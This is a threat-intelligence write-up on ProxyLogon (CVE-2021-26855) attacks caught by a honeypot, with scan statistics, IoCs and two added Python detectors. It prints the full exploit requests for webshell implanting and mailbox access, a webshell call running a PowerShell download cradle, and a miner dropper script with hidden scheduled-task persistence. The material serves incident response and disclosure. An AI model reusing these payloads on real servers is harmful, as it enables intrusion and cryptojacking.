Background
On March 2, 2021, Microsoft disclosed a remote code execution vulnerability in Microsoft Exchange Server [1].
Starting March 3, 2021, the 360 Netlab Anglerfish honeypot began emulating and deploying a Microsoft Exchange honeypot plugin, and we quickly collected a large volume of vulnerability-probing data. So far we have observed attackers implanting webshells, retrieving mailbox information, and even running XMRig cryptomining (http://178.62.226.184/run.ps1). Based on the path name used by the mining files, we named this miner Tripleone.
Starting March 6, 2021, ProjectDiscovery and Microsoft's CSS-Exchange project successively published vulnerability detection scripts [2][3].
Exploiting the Microsoft Exchange Server remote code execution vulnerability requires a multi-step chain, so there is usually a delay between a PoC being published and criminal attackers weaponizing it. We are now seeing that this phase has begun.
CVE-2021-26855: webshell implant
POST /ecp/j2r3.js HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json; charset=utf-8
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.&a=~1942062522; ASP.NET_SessionId=00782f75-8b35-11eb-af5a-560002fbb132; msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.
msExchLogonMailbox: S-1-5-20
Content-Length: 381
{"properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test1337.aspx"}}, "identity": {"DisplayName": "OAB (Default Web Site)", "__type": "Identity:ECP", "RawIdentity": "7280d03f-194a-4bf3-98a7-076e7728321d"}}
CVE-2021-26855: mailbox information retrieval
POST //ecp/ssrf.js HTTP/1.1
Host: {target}
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Hello-World
Content-Type: text/xml
Cookie: X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;
Content-Length: 756
Default
admin@domain.tld
CVE-2021-26855: cryptomining attack
POST /owa/auth/test1337.aspx HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B
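As an added defensive example (not part of the original post), the following Python classifies requests shaped like the three captures above by ProxyLogon stage: a client-supplied X-BEResource cookie on an unauthenticated path, a DDIService SetObject write of an .aspx file, and a POST to the dropped .aspx that runs a PowerShell download cradle. The sample requests are constructed from the captures (cookies shortened); the function names classify and triage are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples modelled on the three captured requests above (cookies
# shortened); not real honeypot records.
SAMPLES = [
    {"method": "POST", "path": "/ecp/j2r3.js",
     "headers": {"Cookie": "X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/"
                 "DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&a=~1942062522"},
     "body": r'{"properties": {"Parameters": {"FilePathName": "\\\\127.0.0.1\\c$\\Program Files'
             r'\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test1337.aspx"}}}'},
    {"method": "POST", "path": "//ecp/ssrf.js",
     "headers": {"Cookie": "X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;"},
     "body": ""},
    {"method": "POST", "path": "/owa/auth/test1337.aspx", "headers": {},
     "body": "code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22"
             "powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28"
             "http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B"},
    {"method": "GET", "path": "/owa/auth/logon.aspx", "headers": {}, "body": ""},
]

def classify(req):
    """Return the ProxyLogon stage tags that match one request."""
    tags = []
    path = "/" + req["path"].lstrip("/")            # collapse the leading "//"
    body = unquote_plus(req["body"])                # decode the form-encoded webshell call
    be = re.search(r"X-BEResource=([^;]+)", req["headers"].get("Cookie", ""))
    if be:
        # Clients never legitimately send the backend-routing cookie; its presence
        # on an unauthenticated static path is the CVE-2021-26855 SSRF itself.
        tags.append("ssrf-cookie")
        if "/EWS/Exchange.asmx" in be.group(1):
            tags.append("ews-mailbox-access")
        if "DDIService.svc/SetObject" in be.group(1) and re.search(r"FilePathName.*\.aspx", body):
            tags.append("webshell-write")
    if (req["method"] == "POST"
            and re.match(r"/(owa/auth|aspnet_client)/[^/]+\.aspx$", path, re.I)
            and re.search(r"WScript\.Shell|DownloadString|\bIEX\b", body)):
        tags.append("webshell-exec")
    return tags

def triage(samples):
    """Map each request path to its tags, dropping requests that match nothing."""
    out = {}
    for s in samples:
        tags = classify(s)
        if tags:
            out[s["path"]] = tags
    return out
```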
The attacker implants the XMRig miner through the file http://178.62.226.184/run.ps1. The attack details are as follows:
$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinue
if($ProcessActive -eq $null)
{
new-item c:\temp\111 -itemtype directory
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://178.62.226.184/config.json","C:\temp\111\config.json")
$WebClient.DownloadFile("http://178.62.226.184/javacpl.exe","C:\temp\111\javacpl.exe")
$WebClient.DownloadFile("http://178.62.226.184/WinRing0x64.sys","C:\temp\111\WinRing0x64.sys")
Start-Process -Filepath "C:\temp\111\javacpl.exe"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString('http://178.62.226.184/run.ps1')"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"
}
else
{
Write-host "run"
}
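The dropper's persistence step is the part a responder can hunt for on disk: Register-ScheduledTask writes an XML task definition under C:\Windows\System32\Tasks. As an added example (not from the original post), this Python audits such a definition for the traits of the task above: a PowerShell action carrying a download cradle, a hidden window, an execution-policy bypass, and a repetition interval of a few minutes. Both task XML documents are constructed to resemble that script's output, and the function name audit_task is an assumption.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definitions: one shaped like the "App2" task the dropper
# registers (description "Check", 3-minute repetition), one benign maintenance
# task. Neither was exported from a real host.
MALICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Check</Description></RegistrationInfo>
  <Triggers><TimeTrigger><Repetition><Interval>PT3M</Interval></Repetition>
    <StartBoundary>2021-03-08T10:00:00</StartBoundary></TimeTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString('http://178.62.226.184/run.ps1')</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2021-03-08T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-File C:\\Scripts\\rotate-logs.ps1</Arguments></Exec></Actions>
</Task>"""

def audit_task(xml_text):
    """Return the suspicious traits found in one Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    findings = []
    for exe in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = (exe.findtext("t:Command", "", NS) or "").lower()
        args = exe.findtext("t:Arguments", "", NS) or ""
        if "powershell" not in cmd:
            continue
        # Same traits as the dropper's -Argument string: fetch-and-eval, hidden, bypass.
        if re.search(r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression", args, re.I):
            findings.append("download-cradle")
        if re.search(r"-w(indowstyle)?\s+hidden", args, re.I):
            findings.append("hidden-window")
        if re.search(r"-e(xecutionpolicy)?\s+bypass", args, re.I):
            findings.append("policy-bypass")
    for interval in root.iterfind(".//t:Repetition/t:Interval", NS):
        # ISO 8601 duration as written by Task Scheduler, e.g. PT3M
        m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", interval.text or "")
        if m:
            secs = int(m.group(1) or 0) * 3600 + int(m.group(2) or 0) * 60 + int(m.group(3) or 0)
            if secs <= 300:   # re-runs every few minutes, like the 3-minute task above
                findings.append("short-repetition")
    return findings
```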
Anglerfish honeypot data
Starting March 6, 2021, the 360 Netlab Anglerfish honeypot system detected scanning for the Microsoft Exchange vulnerability (CVE-2021-26855). As of this writing, the geographic distribution of the scanning source IPs is as follows:
Analysis of the scanned ports shows that the scan targets are mainly port 443 (77.3%), followed by port 80 (11.3%), as shown in the figure below:
Analysis of the captured scan traffic shows that the scanning source IP ASNs (Autonomous System Numbers) are mainly Linode, LLC, DiGiTALOCEAN-ASN and LeaseWeb Netherlands B.V., together accounting for more than 50%. The overall scanning trend is as follows:
Analysis of the captured traffic shows that the top 5 scanning IPs account for 50% of all scanning activity, with 159.89.95.163 alone accounting for 24%, which suggests this IP is operated in an organized manner.
Analysis of the attack traffic shows that attackers have already been able to successfully exploit this vulnerability to implant webshells, as shown in the figure below:
Attackers then use the webshell to carry out further malicious operations, such as implanting the XMRig miner, as shown in the figure below:
rDNS SLD information for some scanning source IPs
A quick look at the rDNS records of the source IPs scanning for the Microsoft Exchange vulnerability (CVE-2021-26855) reveals some organizational information.
Webshell analysis
We observed a large number of webshell path probing requests, most of which are scanning by security vendors and research organizations.
The known webshell paths (with hit counts) are as follows:
Microsoft Exchange server distribution
Through Internet-wide asset mapping, the 360 Quake cyberspace mapping system found 3,378,260 records for Microsoft Exchange servers, corresponding to 534,590 unique IPs; the distribution is shown in the figure below.
Contact us
Interested readers can reach us on Twitter or by email at netlab[at]360.cn.
IoC
IP:
178.62.226.184
157.245.47.214
Miner Proxy:
159.65.206.137:3333
URL:
http://178.62.226.184/mini-reverse.ps1
http://178.62.226.184/run.ps1
http://178.62.226.184/config.json
http://178.62.226.184/javacpl.exe
http://178.62.226.184/WinRing0x64.sys